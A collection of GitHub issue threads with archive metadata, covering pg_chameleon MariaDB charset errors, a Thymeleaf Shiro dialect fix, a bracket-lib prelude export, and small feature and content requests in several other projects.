2022-02-26 00:26:15 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:15 MainProcess INFO global_lib.py (603): Replica process for source mysql ended
# Docker Compose
version: '3'
services:
postgres:
image: postgres:13
volumes:
- ./postgres:/var/lib/postgresql/data
environment:
POSTGRES_DB: dbname
POSTGRES_PASSWORD: password
POSTGRES_USER: user
restart: always
ports:
- "5432:5432"
mysql:
image: mariadb
volumes:
- ./mysql:/var/lib/mysql
- ./mysql-config:/etc/mysql/conf.d
environment:
MYSQL_ROOT_PASSWORD: toor
MYSQL_DATABASE: dbname
MYSQL_USER: user
MYSQL_PASSWORD: password
MYSQL_ALLOW_EMPTY_PASSWORD: "yes"
restart: always
ports:
- "3306:3306"
[mariadbd]
binlog_format = ROW
binlog_row_image = full
log-bin = mysql-bin
server-id = 1
expire_logs_days = 10
---
# global settings
pid_dir: ~/.pg_chameleon/pid/
log_dir: ~/.pg_chameleon/logs/
log_dest: file
log_level: info
log_days_keep: 10
rollbar_key: ''
rollbar_env: ''
# type_override allows the user to override the default type conversion
# into a different one.
type_override:
'tinyint(1)':
override_to: boolean
override_tables:
- '*'
# postgres destination connection
pg_conn:
host: localhost
port: 5432
user: user
password: password
database: dbname
charset: utf8
sources:
mysql:
type: mysql
db_conn:
host: localhost
port: 3306
user: user
password: password
charset: utf8
connect_timeout: 10
schema_mappings:
dbname: archive_wp
limit_tables: []
skip_tables: []
grant_select_to: []
lock_timeout: 120s
my_server_id: 1
replica_batch_size: 10000
replay_max_rows: 10000
batch_retention: 1 day
copy_max_memory: 300M
copy_mode: file
out_dir: /tmp
sleep_loop: 1
on_error_replay: continue
on_error_read: continue
auto_maintenance: disabled
gtid_enable: false
skip_events:
insert: []
delete: []
update: []
keep_existing_schema: true
MariaDB [(none)]> show variables like 'char%'; show variables like 'collation%';
+--------------------------+----------------------------+
| Variable_name | Value |
+--------------------------+----------------------------+
| character_set_client | utf8mb3 |
| character_set_connection | utf8mb3 |
| character_set_database | utf8mb4 |
| character_set_filesystem | binary |
| character_set_results | utf8mb3 |
| character_set_server | utf8mb4 |
| character_set_system | utf8mb3 |
| character_sets_dir | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
8 rows in set (0.001 sec)
+----------------------+--------------------+
| Variable_name | Value |
+----------------------+--------------------+
| collation_connection | utf8mb3_general_ci |
| collation_database | utf8mb4_unicode_ci |
| collation_server | utf8mb4_unicode_ci |
+----------------------+--------------------+
3 rows in set (0.000 sec)
It works with mysql instead of mariadb, disregard :)
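For anyone else hitting this LookupError on MariaDB: the underlying problem is that Python's codec registry has no `utf8mb3` alias (MariaDB 10.6 reports `utf8mb3` where MySQL reports `utf8`). One workaround, not from this thread and not part of pg_chameleon itself, is to register an alias before starting the replica:

```python
import codecs

def _mysql_charset_aliases(name):
    # Map MariaDB/MySQL charset names that Python doesn't know to utf-8.
    if name in ("utf8mb3", "utf8mb4"):
        return codecs.lookup("utf-8")
    return None

codecs.register(_mysql_charset_aliases)

# The decode that crashed pymysqlreplication now succeeds:
assert "héllo".encode("utf-8").decode("utf8mb3") == "héllo"
```

Newer pymysqlreplication releases handle `utf8mb3` themselves, so upgrading the dependency is the cleaner fix where possible.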
|
gharchive/issue
| 2022-02-25T23:45:14 |
2025-04-01T04:36:04.237612
|
{
"authors": [
"ldesgoui"
],
"repo": "the4thdoctor/pg_chameleon",
"url": "https://github.com/the4thdoctor/pg_chameleon/issues/141",
"license": "bsd-2-clause",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1093060352
|
Miss Yunjin cover
https://ys.mihoyo.com/main/character/liyue?char=15
fixed
|
gharchive/issue
| 2022-01-04T06:48:05 |
2025-04-01T04:36:04.244534
|
{
"authors": [
"NepPure",
"theBowja"
],
"repo": "theBowja/genshin-db",
"url": "https://github.com/theBowja/genshin-db/issues/73",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1922584672
|
ValorantStats using Valorant API
Hello, is everything fine? I would like to create an example of using APIs with Python, and to show my love for the game.
I hope you accept and consider it for hacktoberfest.
Ok @jonascarvalh. Go ahead.
#114 All done ✅
The project was reviewed and merged. Thank you @jonascarvalh
Feel free to star this repo and add more projects.
Starred 🌟
|
gharchive/issue
| 2023-10-02T19:58:26 |
2025-04-01T04:36:04.259831
|
{
"authors": [
"jonascarvalh",
"theadeyemiolayinka"
],
"repo": "theadeyemiolayinka/python-scripts",
"url": "https://github.com/theadeyemiolayinka/python-scripts/issues/113",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1007379391
|
Request: add a clear command to the terminal
OK. For now you can use Cmd-K or press the trash can button.
OK, thanks. Hope the software keeps getting better and better.
|
gharchive/issue
| 2021-09-26T12:35:02 |
2025-04-01T04:36:04.278396
|
{
"authors": [
"Veloma-Timer",
"bummoblizard"
],
"repo": "thebaselab/codeapp",
"url": "https://github.com/thebaselab/codeapp/issues/250",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
230304239
|
Shiro Tags not working
All the shiro tags don't seem to work.
I'm using the thymeleaf layout dialect and the shiro dialect.
<th:block th:if="${T(at.pollux.thymeleaf.shiro.processor.ShiroFacade).isUser()}"> works
I checked this issue and I wish @saviola777 shared what his final solution or mistake was.
I really don't want to use the th:if syntax.
Help!
I forgot to add the ShiroDialect to the template engine, e.g.
@Bean
@Autowired
public SpringTemplateEngine templateEngine(ITemplateResolver templateResolver) {
SpringTemplateEngine engine = new SpringTemplateEngine();
engine.setTemplateResolver(templateResolver);
// Enable shiro dialect for thymeleaf
engine.addDialect(new ShiroDialect());
return engine;
}
in a @Configuration class.
Looks like i did the same thing, I didn't have to add the other dialects . I completely forgot!
Thanks!
|
gharchive/issue
| 2017-05-22T07:15:39 |
2025-04-01T04:36:04.283761
|
{
"authors": [
"saviola777",
"ydalley"
],
"repo": "theborakompanioni/thymeleaf-extras-shiro",
"url": "https://github.com/theborakompanioni/thymeleaf-extras-shiro/issues/16",
"license": "apache-2.0",
"license_type": "permissive",
"license_source": "bigquery"
}
|
598259598
|
Export FontCharType in preludes
FontCharType isn't available in the rltk::prelude. It should be.
Additionally: support more conversions.
RLTK does export FontCharType in the prelude. The following works with the 0.8.0 from cargo:
[package]
name = "rltk-test"
version = "0.1.0"
authors = ["Herbert Wolverson <herberticus@gmail.com>"]
edition = "2018"
[dependencies]
rltk = "0.8.0"
use rltk::prelude::*;
struct State {
glyph : FontCharType
}
impl GameState for State {
fn tick(&mut self, ctx: &mut Rltk) {
ctx.cls();
ctx.set(1,1,RGB::named(RED), RGB::named(BLACK), self.glyph);
}
}
fn main() -> RltkError {
let context = RltkBuilder::simple80x50()
.with_title("Hello RLTK World")
.with_fps_cap(30.0)
.build()?;
rltk::main_loop(context, State{
glyph : to_cp437('!')
})
}
|
gharchive/issue
| 2020-04-11T12:48:34 |
2025-04-01T04:36:04.285689
|
{
"authors": [
"thebracket"
],
"repo": "thebracket/bracket-lib",
"url": "https://github.com/thebracket/bracket-lib/issues/114",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
658591076
|
Fixed conflicting prefetchMethods.
Possible fix for #286.
Oh indeed!
Good catch.
Thanks a lot for the fix. Looking at it closely, I realize there is one case where we might still have a conflict.
We might have 2 different prefetch methods with the same names in 2 different classes. In this case, we would still have a conflict.
You should probably modify your PR to also add the class name in the hash computation.
Still, thanks a lot, as this must have been quite hard to diagnose!
Wait, sorry for the comment above, @iganev has got the right solution to this. We are supposed to have one PrefetchBuffer per field and it is the implementation of the SplObjectStorage mapping fields to PrefetchBuffer that was broken.
I'll close this PR and merge #290 instead.
Thanks again for the energy you put in this and sorry for the delay in my answer!
Thanks @moufmouf, it was indeed an issue that was difficult to track down. Glad it's solved now!
|
gharchive/pull-request
| 2020-07-16T21:35:05 |
2025-04-01T04:36:04.300255
|
{
"authors": [
"jensdenies",
"moufmouf"
],
"repo": "thecodingmachine/graphqlite",
"url": "https://github.com/thecodingmachine/graphqlite/pull/287",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1989274035
|
Revolutionize the website
Motivation
I've extracted the HTML framework that is driving the Effection website and the frontside.com website into a separate repo. That way we don't have to copy and paste between the two. It's also this framework that will, in all probability, drive the v3 inspector.
Approach
It's a middleware stack that is divided into three layers: jsx, html, and http. The JSX stack maps Request to JSX elements, then, once you have your html document, the html stack transforms the HTML as a syntax tree, and finally there is the http layer which lets you operate on Request -> Response
By having a proper middleware stack, this will let us have interactive components, and it will also let us perform caching at the HTTP layer.
It's a big change, with plenty of deletions, but here is the core of it:
let app = createRevolution({
jsx: [
route("/", indexRoute()),
route("/docs/:id", docsRoute(docs)),
],
html: [
rebaseMiddleware(),
twindRevolution({ config }),
],
http: [
route("/V2(.*)", v2docsRoute(v2docs)),
baseUrlMiddleware(),
],
});
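The three-layer idea, where each middleware wraps the next handler and transforms a different representation, is language-agnostic. A minimal sketch of the same composition pattern (purely illustrative, not the Revolution API):

```python
# Each middleware takes the next handler and returns a wrapped handler.
def compose(middlewares, handler):
    for mw in reversed(middlewares):
        handler = mw(handler)
    return handler

def jsx_layer(next_handler):
    # Innermost transform: wrap the route's output into an HTML document.
    return lambda req: f"<html>{next_handler(req)}</html>"

def cache_layer(next_handler):
    # Outermost transform: memoize responses, i.e. caching at the HTTP layer.
    cache = {}
    def wrapped(req):
        if req not in cache:
            cache[req] = next_handler(req)
        return cache[req]
    return wrapped

app = compose([cache_layer, jsx_layer], lambda req: f"page for {req}")
print(app("/docs/intro"))
```

Listing `cache_layer` first makes it outermost, which mirrors how the http stack in the snippet above sits outside the jsx and html stacks.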
Screenshots
@taras deno deploy only allows one entry point at a time, so once this is merged we can switch it.
|
gharchive/pull-request
| 2023-11-12T07:18:07 |
2025-04-01T04:36:04.406872
|
{
"authors": [
"cowboyd"
],
"repo": "thefrontside/effection",
"url": "https://github.com/thefrontside/effection/pull/829",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1592322087
|
Detected :)
Hello,
Your code can be easily detected :)
Regards,
Félix.
========== [ Possible malicious code detected in tghtestproj-1.0.0/setup.py ] ==========
import setuptools
from setuptools.command.install import install
from setuptools.command.develop import develop
import base64
import os
def b64d(base64_code):
base64_bytes = base64_code.encode('ascii')
code_bytes = base64.b64decode(base64_bytes)
code = code_bytes.decode('ascii')
return code
def notmalfunc():
os.system(b64d("L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS8xMzM3IDA+JjEK"))
class AfterDevelop(develop):
def run(self):
develop.run(self)
class AfterInstall(install):
def run(self):
install.run(self)
notmalfunc()
setuptools.setup(
name = "tghtestproj",
version = "1.0.0",
author = "TGH",
author_email = "tgh@example.com",
description = "A test package to demonstrate malicious pip packages",
long_description = "long description",
long_description_content_type = "text/markdown",
url = "https://github.com/thegoodhackertv/malpip",
project_urls = {
"Bug Tracker": "https://github.com/thegoodhackertv/malpip/issues",
},
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir = {"": "src"},
packages = setuptools.find_packages(where="src"),
python_requires = ">=3.6",
cmdclass={
'develop': AfterDevelop,
'install': AfterInstall,
},
)
==========================================================
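If you are unsure what a base64 blob in a setup.py does, decode it offline instead of installing the package. For the string in this demo package, decoding reveals a reverse shell pointed at localhost:

```python
import base64

payload = "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS8xMzM3IDA+JjEK"
decoded = base64.b64decode(payload).decode("ascii")
print(decoded)  # reveals the shell command without ever executing it
```

This is why the `cmdclass` hook above is dangerous: `pip install` runs the `install` command, which calls `notmalfunc()` and pipes that decoded string straight into `os.system`.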
Hello, I have a YouTube channel (thegoodhacker) about cybersecurity and I'm showing how it's possible to do this and how to prevent it. I hope it's not a problem. Thanks!
Andres
|
gharchive/issue
| 2023-02-20T18:59:27 |
2025-04-01T04:36:04.420077
|
{
"authors": [
"felixaime",
"thegoodhackertv"
],
"repo": "thegoodhackertv/malpip",
"url": "https://github.com/thegoodhackertv/malpip/issues/1",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
927509203
|
Credit note - global discount
Hello, good afternoon. I'm trying to issue a credit note but it won't let me enter TOTAL DISCOUNTS.
According to SUNAT's documentation, this would be the global discount: cbc:AllowanceTotalAmount
Hi @guillermosg28, this will be addressed in issue #178
|
gharchive/issue
| 2021-06-22T18:12:56 |
2025-04-01T04:36:04.428722
|
{
"authors": [
"giansalex",
"guillermosg28"
],
"repo": "thegreenter/greenter",
"url": "https://github.com/thegreenter/greenter/issues/179",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
31373300
|
Modular Backend
It would be useful if people could integrate their own backend and this module would provide the high-level API to use it.
Some backends:
Redis
Leveldb
:+1:
|
gharchive/issue
| 2014-04-12T01:07:45 |
2025-04-01T04:36:04.433180
|
{
"authors": [
"ericelliott",
"thehydroimpulse"
],
"repo": "thehydroimpulse/rollout",
"url": "https://github.com/thehydroimpulse/rollout/issues/1",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
542990540
|
Concatenate obsm
Adds obsm concatenation in adata.concatenate.
@Koncopd @falexwolf
There is an issue with the obsm concatenation. When we run sc.tl.diffmap on different anndata objects, concatenate them and run sc.pp.neighbors, we get the following exception. The reason is that obsms are concatenated but .uns['diffmap_evals'] is not available.
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
<timed exec> in <module>
/opt/conda/lib/python3.7/site-packages/scanpy/neighbors/__init__.py in neighbors(adata, n_neighbors, n_pcs, use_rep, knn, random_state, method, metric, metric_kwds, copy)
104 if adata.isview: # we shouldn't need this here...
105 adata._init_as_actual(adata.copy())
--> 106 neighbors = Neighbors(adata)
107 neighbors.compute_neighbors(
108 n_neighbors=n_neighbors, knn=knn, n_pcs=n_pcs, use_rep=use_rep,
/opt/conda/lib/python3.7/site-packages/scanpy/neighbors/__init__.py in __init__(self, adata, n_dcs)
527 self._number_connected_components = self._connected_components[0]
528 if 'X_diffmap' in adata.obsm_keys():
--> 529 self._eigen_values = _backwards_compat_get_full_eval(adata)
530 self._eigen_basis = _backwards_compat_get_full_X_diffmap(adata)
531 if n_dcs is not None:
/opt/conda/lib/python3.7/site-packages/scanpy/neighbors/__init__.py in _backwards_compat_get_full_eval(adata)
395 return np.r_[1, adata.uns['diffmap_evals']]
396 else:
--> 397 return adata.uns['diffmap_evals']
398
399
KeyError: 'diffmap_evals'
Doesn't it make more sense to make obsm concatenation False by default, by the way? Should concatenating obsm be the default behaviour?
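For context, obsm concatenation amounts to row-wise stacking per key, keeping only keys present in every object. A pure-Python sketch of the semantics (not anndata's implementation, which operates on numpy arrays):

```python
def concat_obsm(obsms):
    # Keep only keys shared by all objects, then stack their rows in order.
    shared = set(obsms[0]).intersection(*obsms[1:])
    return {k: [row for m in obsms for row in m[k]] for k in sorted(shared)}

# Object a has a diffmap embedding, object b does not, so only X_pca survives.
a = {"X_pca": [[1.0, 2.0]], "X_diffmap": [[0.1]]}
b = {"X_pca": [[3.0, 4.0]]}
print(concat_obsm([a, b]))
```

The diffmap failure above is the flip side of this: even when `X_diffmap` does survive concatenation, the per-object `.uns['diffmap_evals']` it depends on cannot be meaningfully merged.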
|
gharchive/pull-request
| 2019-12-27T21:08:36 |
2025-04-01T04:36:04.455110
|
{
"authors": [
"Koncopd",
"gokceneraslan"
],
"repo": "theislab/anndata",
"url": "https://github.com/theislab/anndata/pull/284",
"license": "bsd-3-clause",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1133254306
|
Dataset summary
Is your dataset not yet in sfaira?
Please search the sfaira code, and issues and PRs for any DOI associated with this dataset, such as preprints or journal publications. To be safe, you can also search for the first author.
Describe the data set
Fill in below:
Link to publication:
Title of publication:
First author of publication:
DOI preprint:
DOI journal:
Download link to any data objects required:
Describe meta data
Optionally, you can already collect meta data information here before starting to write the data loader, or to help others write one.
You can extend these lists if you find more meta data that you want to record before writing a data loader.
Note that you can also directly put this information into a draft data loader and start a pull request instead of first writing an issue.
If you know this dataset well but cannot write a loader right now, this will help other people decide if they want to write a loader for this dataset and will speed up their process.
Is this primary data (not a meta study):
Is most raw gene expression matrix normalized (if yes how)?:
Single-cell assay used:
Disease(s) of sampled individuals (ideally MONDO term):
Organ(s) sampled (ideally UBERON term):
Organism(s) sampled (ideally NCBItaxon term):
Any relevant cell-wise annotation fields that are column names of a table or column names in .obs of an h5ad for example:
Cell type annotation:
Additional context
Add any other context of the dataset or anticipated issues with the dataloader.
Please assign datasets to me for the day2 workshop. Thanks in advance.
|
gharchive/issue
| 2022-02-11T23:02:25 |
2025-04-01T04:36:04.482432
|
{
"authors": [
"ajaykumarsaw"
],
"repo": "theislab/sfaira",
"url": "https://github.com/theislab/sfaira/issues/562",
"license": "BSD-3-Clause",
"license_type": "permissive",
"license_source": "github-api"
}
|
164733243
|
Add a red dot to the mobile menu icon when being notified
On mobile, there is no favicon to toggle, so nothing shows up when a new notification arrives.
This commit changes this by adding a marker on the burger menu icon, visible on all channels.
Result
Browser on the left has the addition: look at the menu icon when browser on the right sends a message.
Themes
Morning
Crypto
Zenburn
Really nice touch, I like it! 👍
Been running this for quite a while, LGTM :+1:.
|
gharchive/pull-request
| 2016-07-10T20:41:04 |
2025-04-01T04:36:04.492834
|
{
"authors": [
"astorije",
"maxpoulin64",
"williamboman"
],
"repo": "thelounge/lounge",
"url": "https://github.com/thelounge/lounge/pull/486",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1236163845
|
Could not be deployed to Heroku
Heroku returns the following message when attempting to deploy:
Item could not be created:
We couldn't deploy your app because the source code violates the Salesforce Acceptable Use and External-Facing Services Policy.
Please check this discussion here - https://github.com/thelovekesh/ghost-v4-on-heroku/issues/51 and be sure to explore closed issues before opening a new ticket based on the same topic.
|
gharchive/issue
| 2022-05-15T01:59:28 |
2025-04-01T04:36:04.494961
|
{
"authors": [
"je-guerreroa1-uniandes",
"thelovekesh"
],
"repo": "thelovekesh/ghost-v4-on-heroku",
"url": "https://github.com/thelovekesh/ghost-v4-on-heroku/issues/54",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2394976999
|
Update collection detail page for collection like feature
Description
To increase engagement between collection author and reader, we'll introduce collection like feature.
[ ] Add like button and integrate API for collection like
[ ] Update collection detail page
References
design
figma
|
gharchive/issue
| 2024-07-08T08:22:26 |
2025-04-01T04:36:04.499608
|
{
"authors": [
"byhow",
"zeckli"
],
"repo": "thematters/matters-web",
"url": "https://github.com/thematters/matters-web/issues/4626",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
714312281
|
updated visibility icon and added copy icon for signing key
This fixes issue #369.
@buckyroberts I approved, but can you check if this happens?
|
gharchive/pull-request
| 2020-10-04T13:16:46 |
2025-04-01T04:36:04.511574
|
{
"authors": [
"angle943",
"leelatanniru"
],
"repo": "thenewboston-developers/Account-Manager",
"url": "https://github.com/thenewboston-developers/Account-Manager/pull/374",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2499695527
|
Aligned afatfs_t cache
Moved afatfs_superClusterSize() to compile, required for linking.
Added afatfs_feof() to header files for application use.
Created fat_convertFATStyleToFile() and declaration for use by applications.
Thanks for the patch, that's merged now! feof() was actually already in the header.
|
gharchive/pull-request
| 2024-09-01T21:39:24 |
2025-04-01T04:36:04.521478
|
{
"authors": [
"sean-lawless",
"thenickdude"
],
"repo": "thenickdude/asyncfatfs",
"url": "https://github.com/thenickdude/asyncfatfs/pull/7",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
179469170
|
Detect active tab
Is there a way for inview to detect whether the object is actually visible?
I'm pretty sure there's no way to know whether another window obstructs the visibility, but maybe there's a way to know whether the tab is actually active, or whether another tab of the same window is opened.
Here are some resources that might help: https://stackoverflow.com/questions/1760250/how-to-tell-if-browser-tab-is-active
there is for sure a way to detect if a window/tab is active. how would you see this fit for this directive though? Could you give a code example of how you'd use the directive?
I see different possibilities. Either a separate attribute:
<div in-view="$inview && ctrl.isVisible()" strict-visibility="true"></div>
Or an attribute on $inviewInfo:
<div in-view="$inview && $inviewInfo.hasFocus && ctrl.isVisible()"></div>
In any case it would mean that inview would have to raise an event if the tab/window focus changes. Maybe that could be implemented as a configuration, either via attribute or using a provider.
It would certainly be useful if inview would detect focus, as some things don't need to be done if the window is not focused, saving energy on mobile devices. Another use case is "read notifications" if a user looks at a certain element. If a window is out of focus, a read notification should not be triggered, even if the object is inside the viewport.
Perhaps you could apply it to the in-view-container. In this case the container would be the tab, and so, if specified, you check to see if the container is visible?
So after looking at this a little more, hopefully I have a solution (above).
Adding the requireOffsetParent to in-view-options should address the issue by only regarding an element as in view if it both overlaps with the viewport boundingRect and it has an offsetParent.
I chose not to make it the default behaviour because:
An offsetParent is never reported for a fixed positioned element - you'd need to make additional checks for it
Putting it behind an optional flag is safer as I don't know all the nuances of when it should normally trigger
Regarding this issue: Checking for document.hidden === false and/or document.visibilityState === 'visible' should suffice.
https://developer.mozilla.org/en-US/docs/Web/API/Page_Visibility_API
I'll give it a stab, but might need your help.
A fix for this is waiting in #122. Any chance to get that merged?
We're using angular-inview in Threema Web, where the ability to detect active tabs would help to improve usability.
|
gharchive/issue
| 2016-09-27T11:38:35 |
2025-04-01T04:36:04.527908
|
{
"authors": [
"dbrgn",
"evenicoulddoit",
"thenikso"
],
"repo": "thenikso/angular-inview",
"url": "https://github.com/thenikso/angular-inview/issues/111",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
2419074065
|
🐛✅ Bugfix: don't throw away "0" string when creating streamed response
I had a bug where my response often got cut off, and instead of returning the year "2020" in the response, it would always return "202".
I found out that it only happens when streaming the response.
After looking around I found the issue to be inside of the OpenAIChat::createStreamedResponse() method. There is a check there like this: if (! ($partialResponse->choices[0]->delta->content)) { continue; } but if the string is "0" then this also evaluates to true causing the "0" to be ignored when it's the only character in the partial response.
I changed this to explicitly check whether the content is null or '' instead. I also added a test to validate that "0" is not thrown away anymore.
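In PHP the string "0" is falsy, so the bare truthiness test swallowed it. The same class of bug exists wherever a truthiness check stands in for an explicit null/empty check; a minimal Python sketch of the pattern (hypothetical helper names, not LLPhant's actual code, which is PHP):

```python
def keep_chunks_buggy(chunks):
    # Bare truthiness test: silently drops falsy-but-valid chunks such as 0.
    return [c for c in chunks if c]

def keep_chunks_fixed(chunks):
    # Explicit check, mirroring the PR's fix: only skip None and ''.
    return [c for c in chunks if c is not None and c != '']

chunks = ["202", 0, "", None]
print(keep_chunks_buggy(chunks))  # → ['202']
print(keep_chunks_fixed(chunks))  # → ['202', 0]
```

The explicit version keeps every real chunk while still skipping the "no content" sentinels.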
funny bug.. Thanks a lot @synio-wesley for the PR !
|
gharchive/pull-request
| 2024-07-19T14:33:09 |
2025-04-01T04:36:04.538782
|
{
"authors": [
"MaximeThoonsen",
"synio-wesley"
],
"repo": "theodo-group/LLPhant",
"url": "https://github.com/theodo-group/LLPhant/pull/178",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2048643348
|
net8.0 Button Click event won't fire
After updating the project to 27.1.0.43644 with net8.0, button clicks won't fire in Blazor; going back to 27.1.0.43604 with net7.0 works.
It turned out one needed to set BrowserWindowOptions -> WebPreferences -> AllowRunningInsecureContent to true; it defaults to false in dotnet 8.0.
@Cav-jj can I close the issue then?
|
gharchive/issue
| 2023-12-19T13:18:03 |
2025-04-01T04:36:04.540275
|
{
"authors": [
"Cav-jj",
"theolivenbaum"
],
"repo": "theolivenbaum/electron-sharp",
"url": "https://github.com/theolivenbaum/electron-sharp/issues/22",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
863922523
|
0.0.6_3 - seems to have input validation issue on "AllowedIPs" field - leading white space is permitted and saved
Editing the peer, removing the leading white space that originated from a copy/paste issue and then clicking UPDATE followed by SAVE does not save the new value. The leading white space is still there. I can get rid of it by editing the value for instance by changing 172.16.71.2/32 to 172.16.71.3/32 and removing the white space.
The presence of the white space seemed to break my functionality.
Edit:
The presence of the leading white space seems cosmetic in nature. It does affect the way the AllowedIPs = lines are written in the tun_wg*.conf
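The kind of normalisation that would avoid writing the stray space into tun_wg*.conf is simply trimming each entry on save; a hedged Python sketch of that idea (function name invented for illustration, the actual package is PHP):

```python
def normalize_allowed_ips(raw: str) -> str:
    # Split a comma-separated AllowedIPs value, strip surrounding
    # whitespace from each entry, and drop empty fragments.
    entries = [part.strip() for part in raw.split(",") if part.strip()]
    return ", ".join(entries)

print(normalize_allowed_ips(" 172.16.71.2/32"))          # → 172.16.71.2/32
print(normalize_allowed_ips("10.0.0.1/32 , fd00::/64"))  # → 10.0.0.1/32, fd00::/64
```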
This field is a crossover from the Netgate code. I am not currently using this underneath. It has usefulness for features we'd like to have, but right now it is just cosmetic.
@theonemcdonald Should the field be hidden for now if its not used for anything as it could be confusing?
This field is a crossover from the Netgate code. I am not currently using this underneath. It has usefulness for features we'd like to have, but right now it is just cosmetic.
I uploaded and worked from the wrong screenie. Updated original post now.
Actual Issue is re: AllowedIPs = but cosmetic only. PeerAddress = seems indeed inert.
I'm going to close this and file it under cosmetic bug. Low priority and will likely get fixed organically as I continue to improve the UX.
|
gharchive/issue
| 2021-04-21T13:57:49 |
2025-04-01T04:36:04.545192
|
{
"authors": [
"Tigger2014",
"mfld-pub",
"theonemcdonald"
],
"repo": "theonemcdonald/pfSense-pkg-WireGuard",
"url": "https://github.com/theonemcdonald/pfSense-pkg-WireGuard/issues/35",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
747183747
|
CPO: Set required env variables in conformance test
Dumping logs on master is failing due to unset KUBE_MASTER variables:
2020-11-19 16:13:12.858162 | k8s-master | Dumping logs from master locally to '/home/zuul/workspace/logs/kubernetes'
2020-11-19 16:13:12.858754 | k8s-master | KUBE_MASTER_IP:
2020-11-19 16:13:12.858800 | k8s-master | KUBE_MASTER:
2020-11-19 16:13:12.859247 | k8s-master | ./cluster/log-dump/log-dump.sh: line 343: MASTER_NAME: unbound variable
https://logs.openlabtesting.org/logs/periodic-14/github.com/kubernetes/cloud-provider-openstack/master/cloud-provider-openstack-acceptance-test-e2e-conformance/0828ff0/job-output.txt.gz
This PR sets the env variables to master ip.
@wangxiyuan could you please review? Thanks.
|
gharchive/pull-request
| 2020-11-20T05:46:18 |
2025-04-01T04:36:04.547844
|
{
"authors": [
"ramineni"
],
"repo": "theopenlab/openlab-zuul-jobs",
"url": "https://github.com/theopenlab/openlab-zuul-jobs/pull/1054",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
172352439
|
Added script prefill.php to replace all :variables
I created a script to prefill all :variables and the library namespace at once.
To run it, just type
$ php prefill.php
It is not possible to run the script via $ composer prefill because Composer will fail due to some wrong data in composer.json (i.e. wrong email ':author_email').
The script will ask for all variables, providing some sensible defaults when possible, and will do the replacements in composer.json, *.md and src/*.php.
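The replacement itself boils down to a substitution over each file's text; a rough Python equivalent of what such a prefill script does (names assumed — the actual script is PHP):

```python
import re

def prefill(text: str, values: dict) -> str:
    # Replace each :placeholder token with its value,
    # leaving unknown placeholders untouched.
    return re.sub(r":(\w+)", lambda m: values.get(m.group(1), m.group(0)), text)

template = '"authors": [{"name": ":author_name", "email": ":author_email"}]'
print(prefill(template, {"author_name": "Jane", "author_email": "jane@example.com"}))
# → "authors": [{"name": "Jane", "email": "jane@example.com"}]
```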
I tried to squash several commits and now I realized I pulled three commits instead of one. Sorry about that.
|
gharchive/pull-request
| 2016-08-22T01:00:19 |
2025-04-01T04:36:04.559176
|
{
"authors": [
"jotaelesalinas"
],
"repo": "thephpleague/skeleton",
"url": "https://github.com/thephpleague/skeleton/pull/88",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
204484627
|
Technical/issue 14 plugin poc 2
resolves issue #14
Outstanding issue: Trying to test a slow webpack build (using sleep) to try and test if a build takes too long
https://github.com/thescientist13/build-profiler-webpack-plugin/pull/16/files#diff-7a23888cadd38b3e12481e212a9ae91fR22
ok to test
ok to test
|
gharchive/pull-request
| 2017-02-01T02:47:32 |
2025-04-01T04:36:04.621178
|
{
"authors": [
"thescientist13"
],
"repo": "thescientist13/build-profiler-webpack-plugin",
"url": "https://github.com/thescientist13/build-profiler-webpack-plugin/pull/16",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
174446655
|
VRTK_Simulator directions don't match the current camera orientation
With no rotation on the playspace left/right rotate left/right were reversed. Rotating the playspace 180 degrees (before hitting play) fixed that problem, but the forward/backwards movement was then reversed. This is probably a problem with the movement directions not taking camera orientation into consideration when applying the movement offset.
I attached it to the CameraRig and the Camera(head). Both seemed wrong. It's also possible that I just don't know what I'm doing. :smile:
Fixed with https://github.com/thestonefox/SteamVR_Unity_Toolkit/pull/495
maybe?
I don't think so, he fixes the left/right thing. But there's something still inherently wrong with the rotation. Rotate the camera 180 degrees and I think the forward/backward becomes reversed.
re-opening then :)
I wonder if this is related to the Box Collider that gets added as a child of the Camera Rig by PlayerPresence. I noticed it does not follow the rotation of the headset or eye camera (it seems it should follow Y, at least). I was adding some momentum to the player and depending on the initial orientation of the rig, sometimes the force was incorrect by 90, 180 or 270 degrees (based on the initial Rig rotation).
Perhaps not totally related, but wouldn't it be better to move and rotate the whole CameraRig (basically the "physical" room space) with the simulator instead of moving the camera? The best solution would be perhaps to map the camera direction as forward first so controlling the rig could be like an FPS controller.
Or is there an specific reason for working with the camera?
@sblancodiez I think the point of the script is to simulate headset movement without having to pick up the HMD and physically put it on your head. If that's accurate then it would make sense to only do it on the camera.
